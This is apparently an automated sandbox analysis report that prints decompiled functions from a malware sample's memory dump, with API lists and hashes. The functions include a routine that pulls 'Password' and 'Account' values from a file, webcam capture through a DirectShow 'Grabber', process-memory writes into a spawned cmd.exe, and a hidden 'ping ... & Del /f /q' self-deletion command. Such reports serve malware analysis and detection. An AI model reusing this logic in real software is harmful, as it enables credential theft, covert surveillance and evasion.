                                  0x00000000
                                  0x0040ee63
                                  0x00000000
                                  0x00000000
                                  0x0040ee67
                                  0x0040ee92
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                  • WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                  • LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                  • LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                  • ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                  • ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
                                  • String ID: `@
                                  • API String ID: 3276737649-951712118
                                  • Opcode ID: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction ID: e72bb7fa78d81cf8525c6baf04ae928c9dbf0452580219fbc960ee642851fe31
                                  • Opcode Fuzzy Hash: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction Fuzzy Hash: B5415B35100016FFCB128FAACD8489ABFB5FF0A35071485A2F509EA2B0D736D920DF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409244, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 229fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E00409244(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t102;
				char _t104;
				void* _t125;
				intOrPtr _t127;
				char _t128;
				long _t133;
				void* _t135;
				intOrPtr _t136;
				void* _t141;
				void* _t146;
				void* _t147;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr _t175;
				intOrPtr* _t177;
				CHAR* _t178;
				void* _t179;
				void* _t180;

				_v36 = __ecx;
				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t174 != 0xffffffff) {
					_t133 = GetFileSize(_t174, 0);
					_v16 = _t133;
					_t172 = E00401085(_t133);
					_v32 = _t172;
					E00401052(_t172, 0, _t133);
					_v24 = _v24 & 0x00000000;
					_t180 = _t179 + 0x10;
					ReadFile(_t174, _t172, _t133,  &_v24, 0);
					CloseHandle(_t174);
					_t175 = E00405FFA(0x400000);
					_v28 = _t175;
					_a4 = E00405FFA(0x104);
					_t96 = E00405FFA(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t135 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E00405FEB(_a4);
						E00405FEB(_v12);
						E00405FEB(_t175);
						return E00401099(_t172);
					} else {
						goto L3;
					}
					do {
						L3:
						_t167 =  *((intOrPtr*)(_t135 + _t172));
						_t13 = _t167 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t167 - 0x3d;
						if(_t167 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t175)) = _t167;
						_t141 = _t141 + 1;
						__eflags = _t167;
						if(_t167 != 0) {
							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
								__eflags =  *_t172 - 0xd0;
								_t102 = 2;
								_t146 = 9;
								_t103 =  !=  ? _t146 : _t102;
								_t168 = 0;
								_t147 = ( !=  ? _t146 : _t102) + _t135;
								_t104 =  *((intOrPtr*)(_t147 + _t172));
								__eflags = _t104 - 0x20;
								if(_t104 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									__eflags = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									 *((char*)(_t168 +  *_t60)) = 0;
									E004034D1( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E004034D1( &_v16,  *_t66);
									E00403549( &_v44, E004031AF( &_v20, __eflags,  &_v32));
									E00405FEB(_v32);
									E00403549( &_v48, E004031AF( &_v16, __eflags,  &_v32));
									E00405FEB(_v32);
									_v40 = 5;
									E00403549( &_v52, E004036F7( &_v32, 0x417668));
									E00405FEB(_v32);
									E00401FF2(_t180 - 0x10,  &_v52);
									E00402028(_v36);
									E00405FEB(_v16);
									E00405FEB(_v20);
									E00401441( &_v52);
									goto L36;
								}
								_t58 =  &_v12; // 0x50
								_t136 =  *_t58;
								_t165 = _t147 + _t172;
								__eflags = _t165;
								while(1) {
									__eflags = _t104 - 0x7f;
									if(_t104 >= 0x7f) {
										goto L35;
									}
									__eflags = _t104 - 0x21;
									if(_t104 == 0x21) {
										goto L35;
									}
									 *((char*)(_t168 + _t136)) = _t104;
									_t168 = _t168 + 1;
									_t165 = _t165 + 1;
									_t104 =  *_t165;
									__eflags = _t104 - 0x20;
									if(_t104 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t172 - 0xd0;
						_t125 = 2;
						_t169 = 9;
						_t126 =  !=  ? _t169 : _t125;
						_t170 = 0;
						_t127 = ( !=  ? _t169 : _t125) + _t135;
						_v20 = _t127;
						_t128 =  *((intOrPtr*)(_t127 + _t172));
						__eflags = _t128 - 0x20;
						if(_t128 <= 0x20) {
							L19:
							 *((char*)(_t170 + _a4)) = 0;
							goto L28;
						}
						_t177 = _v20 + _t172;
						__eflags = _t177;
						_v20 = _t177;
						_t173 = _t177;
						_t178 = _a4;
						while(1) {
							__eflags = _t128 - 0x7f;
							if(_t128 >= 0x7f) {
								break;
							}
							_t173 = _t173 + 1;
							 *((char*)(_t170 + _t178)) = _t128;
							_t170 = _t170 + 1;
							_t128 =  *_t173;
							__eflags = _t128 - 0x20;
							if(_t128 > 0x20) {
								continue;
							}
							break;
						}
						_t175 = _v28;
						_t172 = _v32;
						goto L19;
						L28:
						_t135 = _t135 + 1;
						__eflags = _t135 - _v16;
					} while (_t135 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t174);
			}







































                                  0x0040924f
                                  0x00409267
                                  0x0040926c
                                  0x00409288
                                  0x0040928b
                                  0x00409294
                                  0x00409299
                                  0x0040929c
                                  0x004092a1
                                  0x004092a8
                                  0x004092b1
                                  0x004092b8
                                  0x004092c8
                                  0x004092d1
                                  0x004092db
                                  0x004092de
                                  0x004092e3
                                  0x004092e5
                                  0x004092ea
                                  0x004092ec
                                  0x004092ef
                                  0x004094da
                                  0x004094dd
                                  0x004094e5
                                  0x004094ec
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004092f5
                                  0x004092f5
                                  0x004092f5
                                  0x004092f8
                                  0x004092fb
                                  0x004092fd
                                  0x00000000
                                  0x00000000
                                  0x00409303
                                  0x00409306
                                  0x00000000
                                  0x00000000
                                  0x0040930c
                                  0x0040930f
                                  0x00409310
                                  0x00409312
                                  0x004093b1
                                  0x004093b6
                                  0x00000000
                                  0x00000000
                                  0x004093b8
                                  0x004093bd
                                  0x00000000
                                  0x00000000
                                  0x004093bf
                                  0x004093c4
                                  0x00000000
                                  0x00000000
                                  0x004093c6
                                  0x004093cb
                                  0x00000000
                                  0x00000000
                                  0x004093cd
                                  0x004093d2
                                  0x00000000
                                  0x00000000
                                  0x004093d4
                                  0x004093d9
                                  0x00000000
                                  0x00000000
                                  0x004093db
                                  0x004093e0
                                  0x00000000
                                  0x00000000
                                  0x004093e2
                                  0x004093e7
                                  0x004093f8
                                  0x004093fd
                                  0x00409400
                                  0x00409401
                                  0x00409404
                                  0x00409406
                                  0x00409409
                                  0x0040940c
                                  0x0040940e
                                  0x00409428
                                  0x00409428
                                  0x0040942b
                                  0x0040942d
                                  0x00409430
                                  0x00409433
                                  0x00409436
                                  0x0040943d
                                  0x00409442
                                  0x00409448
                                  0x0040945d
                                  0x00409465
                                  0x0040947a
                                  0x00409482
                                  0x0040948f
                                  0x0040949f
                                  0x004094a7
                                  0x004094b5
                                  0x004094bd
                                  0x004094c5
                                  0x004094cd
                                  0x004094d5
                                  0x00000000
                                  0x004094d5
                                  0x00409410
                                  0x00409410
                                  0x00409413
                                  0x00409413
                                  0x00409415
                                  0x00409415
                                  0x00409417
                                  0x00000000
                                  0x00000000
                                  0x00409419
                                  0x0040941b
                                  0x00000000
                                  0x00000000
                                  0x0040941d
                                  0x00409420
                                  0x00409421
                                  0x00409422
                                  0x00409424
                                  0x00409426
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00409426
                                  0x00000000
                                  0x00409415
                                  0x00000000
                                  0x004093e7
                                  0x00409318
                                  0x0040931b
                                  0x00000000
                                  0x00000000
                                  0x00409321
                                  0x00409326
                                  0x00000000
                                  0x00000000
                                  0x0040932c
                                  0x00409331
                                  0x00000000
                                  0x00000000
                                  0x00409337
                                  0x0040933c
                                  0x00000000
                                  0x00000000
                                  0x00409342
                                  0x00409347
                                  0x00000000
                                  0x00000000
                                  0x0040934d
                                  0x00409352
                                  0x00000000
                                  0x00000000
                                  0x00409358
                                  0x0040935d
                                  0x00000000
                                  0x00000000
                                  0x00409363
                                  0x00409368
                                  0x00000000
                                  0x00000000
                                  0x0040936a
                                  0x0040936f
                                  0x00409372
                                  0x00409373
                                  0x00409376
                                  0x00409378
                                  0x0040937a
                                  0x0040937d
                                  0x00409380
                                  0x00409382
                                  0x004093a6
                                  0x004093a9
                                  0x00000000
                                  0x004093ad
                                  0x00409387
                                  0x00409387
                                  0x00409389
                                  0x0040938c
                                  0x0040938e
                                  0x00409391
                                  0x00409391
                                  0x00409393
                                  0x00000000
                                  0x00000000
                                  0x00409395
                                  0x00409396
                                  0x00409399
                                  0x0040939a
                                  0x0040939c
                                  0x0040939e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040939e
                                  0x004093a0
                                  0x004093a3
                                  0x00000000
                                  0x004093e9
                                  0x004093e9
                                  0x004093ea
                                  0x004093ea
                                  0x00000000
                                  0x004093f3
                                  0x0040926e
                                  0x00000000

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                  • GetLastError.KERNEL32 ref: 0040926E
                                  • CloseHandle.KERNEL32(00000000), ref: 00409275
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409282
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004092B1
                                  • CloseHandle.KERNEL32(00000000), ref: 004092B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateErrorLastReadSize
                                  • String ID: Password$Password
                                  • API String ID: 1366138817-7788977
                                  • Opcode ID: 03cb85b73b3a8ba81eb47b896a70f04b67c39f35aea174c06fd08411b80ec136
                                  • Instruction ID: 0d079fec5c7f131bda1ced3cf5849022ba7cb4fed2040c8ba0bcc6ec81886411
                                  • Opcode Fuzzy Hash: 03cb85b73b3a8ba81eb47b896a70f04b67c39f35aea174c06fd08411b80ec136
                                  • Instruction Fuzzy Hash: 3F81F270C08246AEEB259B65C891BEE7B74AF09318F54817FE441BA2C3C77D5D828B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004146E1, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 175comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E004146E1(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_t2 =  &_v24; // 0x414222
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x4175c0, 0, 1, 0x41a79c, _t2);
				_t7 =  &_v24; // 0x414222
				_t91 =  *_t7;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t56 =  &_v24; // 0x414222
					_t95 =  *_t56;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x4175a0,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E00414A12(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x417610, 0, 1, 0x41a78c,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E00401052( &_v144, 0, 0x48);
					_t22 =  &_v24; // 0x414222
					_t80 =  *_t22;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E0041462F();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E0041464B();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t31 =  &_v24; // 0x414222
								_t82 =  *_t31;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E0040102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E00414492( &_v216);
								_t63 = E00414AD1(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}































                                  0x004146ef
                                  0x004146f3
                                  0x004146f9
                                  0x004146fc
                                  0x00414708
                                  0x0041470b
                                  0x0041470d
                                  0x00414710
                                  0x00414712
                                  0x00414715
                                  0x00414720
                                  0x00414722
                                  0x00414722
                                  0x00414727
                                  0x00414851
                                  0x00414851
                                  0x00414856
                                  0x0041485b
                                  0x0041485e
                                  0x0041485e
                                  0x00414862
                                  0x00414862
                                  0x00414867
                                  0x0041486c
                                  0x0041486f
                                  0x0041486f
                                  0x00414873
                                  0x00414878
                                  0x0041487d
                                  0x00414880
                                  0x00414880
                                  0x00414884
                                  0x00414884
                                  0x00414889
                                  0x0041488e
                                  0x00414891
                                  0x00414891
                                  0x00414897
                                  0x0041489c
                                  0x0041489c
                                  0x004148a1
                                  0x004148a6
                                  0x004148a6
                                  0x004148a9
                                  0x004148b3
                                  0x004148b3
                                  0x00414739
                                  0x0041473b
                                  0x00414740
                                  0x00000000
                                  0x00000000
                                  0x00414749
                                  0x00414752
                                  0x0041475a
                                  0x00000000
                                  0x00000000
                                  0x00414771
                                  0x00414773
                                  0x00414778
                                  0x00414789
                                  0x0041478c
                                  0x0041479a
                                  0x004147a7
                                  0x004147b1
                                  0x004147b1
                                  0x004147c3
                                  0x004147c6
                                  0x004147c7
                                  0x004147c8
                                  0x004147d1
                                  0x004147d2
                                  0x004147d3
                                  0x004147d4
                                  0x004147d7
                                  0x004147dd
                                  0x004147e2
                                  0x004147e6
                                  0x004147eb
                                  0x004147f0
                                  0x004147f4
                                  0x004147f6
                                  0x004147fe
                                  0x00414803
                                  0x00414805
                                  0x00414805
                                  0x00414812
                                  0x00414815
                                  0x0041481d
                                  0x0041482a
                                  0x00414838
                                  0x0041484c
                                  0x0041484c
                                  0x00414803
                                  0x004147f4
                                  0x004147e6
                                  0x00000000

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004146F3
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,"BA), ref: 00414720
                                  • CoUninitialize.OLE32 ref: 004148A9
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414771
                                    • Part of subcall function 00414492: CoTaskMemFree.OLE32(?), ref: 004144A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                  • String ID: "BA$Grabber$Source$vids
                                  • API String ID: 533512943-1720631296
                                  • Opcode ID: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction ID: 2c6567443aae3fa2ccd83cd9410249409bd9c9e0b512ace47bdcaa6ee1176714
                                  • Opcode Fuzzy Hash: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                  • Instruction Fuzzy Hash: D7517F75A00209AFDB14EFA5C888EEEB7B9FF84305F14846EF915AB250C7759D40CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402A9C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106processthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00402A9C() {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v92;
				char _v352;
				char _v816;
				char _v817;
				char _v872;
				void* _t59;
				void* _t66;
				void* _t69;

				_t59 = _t66;
				_t69 = _t59;
				E004124D7(_t69 + 0x10);
				if( *((intOrPtr*)(_t69 + 0x68)) != 0) {
					TerminateThread( *0x559cb4, 0);
				}
				if( *((intOrPtr*)(_t69 + 0x50)) != 0) {
					E00412612(_t69 + 4,  *((intOrPtr*)(_t69 + 8)), _t69 + 0x14, 0x20006, 0);
					E004124F2(_t69 + 4, E004036F7( &_v8, L"Load"));
					E00405FEB(_v8);
					E00412554(_t69 + 4);
				}
				E00401052( &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetModuleFileNameA(0,  &_v352, 0x104);
				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
				E0040102C( &_v817, "\"", 1);
				E0040102C( &_v816,  &_v352, E00401133( &_v352));
				E0040102C(E00401133( &_v352) + 0x38 +  &_v872, "\"", 2);
				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitProcess(0);
			}













                                  0x00402a9c
                                  0x00412d01
                                  0x00412d06
                                  0x00412d10
                                  0x00412d19
                                  0x00412d19
                                  0x00412d22
                                  0x00412d36
                                  0x00412d4b
                                  0x00412d53
                                  0x00412d5a
                                  0x00412d5a
                                  0x00412d66
                                  0x00412d70
                                  0x00412d74
                                  0x00412d7a
                                  0x00412d7b
                                  0x00412d84
                                  0x00412d98
                                  0x00412dac
                                  0x00412dcc
                                  0x00412dec
                                  0x00412e0e
                                  0x00412e1d
                                  0x00412e22
                                  0x00412e25

                                  APIs
                                    • Part of subcall function 004124D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 004124DE
                                  • TerminateThread.KERNEL32(00000000,?,?), ref: 00412D19
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00412D84
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00412E0E
                                  • CloseHandle.KERNEL32(?), ref: 00412E1D
                                  • CloseHandle.KERNEL32(?), ref: 00412E22
                                  • ExitProcess.KERNEL32 ref: 00412E25
                                  Strings
                                  • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 00412D92
                                  • Load, xrefs: 00412D3B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                  • String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                  • API String ID: 3630425516-2018186591
                                  • Opcode ID: 7d8412575df04c221866460368bba47d86fea5181df5bc930e079ec84a73bd12
                                  • Instruction ID: 037c922c3f030f8a7e2167b9092222fb162bc460f9f39b1e2300c97669b415f7
                                  • Opcode Fuzzy Hash: 7d8412575df04c221866460368bba47d86fea5181df5bc930e079ec84a73bd12
                                  • Instruction Fuzzy Hash: 623167B1900619BFDB11EBA1CD86EEF777DFF04304F004476B205A6191DB78AE948BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413EBA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00413EBA() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E0041405F(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E0040102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E00401052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E00413F7F(_t24);
						}
					}
				}
				return _t10;
			}










                                  0x00413ec9
                                  0x00413ecc
                                  0x00413ed3
                                  0x00413edb
                                  0x00413ee4
                                  0x00413f6a
                                  0x00413f6f
                                  0x00413f71
                                  0x00413f73
                                  0x00000000
                                  0x00413f73
                                  0x00413eea
                                  0x00413efd
                                  0x00413f05
                                  0x00413f1c
                                  0x00413f2b
                                  0x00413f35
                                  0x00413f39
                                  0x00413f3a
                                  0x00413f3b
                                  0x00413f50
                                  0x00413f58
                                  0x00413f5f
                                  0x00413f65
                                  0x00413f75
                                  0x00000000
                                  0x00413f75
                                  0x00413f58
                                  0x00413ee4
                                  0x00413f7e

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,00000000,74A313FB,00000000), ref: 00413ECC
                                  • IsWow64Process.KERNEL32(00000000), ref: 00413ED3
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00413EF7
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00413F05
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00413F13
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00413F50
                                  • Sleep.KERNEL32(000003E8), ref: 00413F5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 3151064845-2003734499
                                  • Opcode ID: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction ID: afe1c3a2dd0aca87645a04bed0ab53e4b63e38e155d51139ff1440feea8eaa1f
                                  • Opcode Fuzzy Hash: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction Fuzzy Hash: 6D1181B1A04309BFFB109BB59C49FEF767CEB08785F004036F605E6290DA789E458669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B87D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B87D(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E00401052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}









                                  0x0040b891
                                  0x0040b89b
                                  0x0040b8a1
                                  0x0040b8a3
                                  0x0040b8a5
                                  0x0040b8b9
                                  0x0040b8c7
                                  0x0040b8e8
                                  0x00000000
                                  0x0040b910
                                  0x0040b8fd
                                  0x0040b906
                                  0x00000000

                                  APIs
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                  • lstrcatW.KERNEL32 ref: 0040B8C7
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                  • RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
